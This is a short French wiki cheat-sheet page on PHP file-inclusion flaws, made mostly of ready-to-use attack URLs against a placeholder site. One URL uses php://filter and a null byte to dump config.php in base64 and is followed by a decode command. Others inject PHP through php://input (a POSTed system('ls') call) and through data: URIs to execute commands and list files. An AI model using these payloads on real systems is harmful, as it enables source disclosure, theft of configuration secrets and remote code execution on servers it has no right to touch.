1.8 Failles include

De UnixWiki
Version datée du 23 août 2015 à 20:49 par Futex (discussion | contributions)
(diff) ← Version précédente | Voir la version actuelle (diff) | Version suivante → (diff)
Aller à la navigation Aller à la recherche

Lire un script PHP à la volé mettre dans l'include:

  http://www.pwnsite.com/index.php?page=php://filter/convert.base64-encode/resource=config.php%00

Reste plus qu'à le décoder pour avoir la page en clair

 echo "cHJvdXQ=" | base64 -d

On peut executer aussi des commandes en utilisant php://input ou data:text/plaintext (le null byte est nécessaire suivant le filtre..)

 http://www.pwnsite.com/index.php?page=php://input%00 (passé en paramètre POST <? system("ls"); ?>)
 http://www.pwnsite.com/index.php?page=data:text/plaintext,<?php $files = scandir('./');print_r($files); ?>%00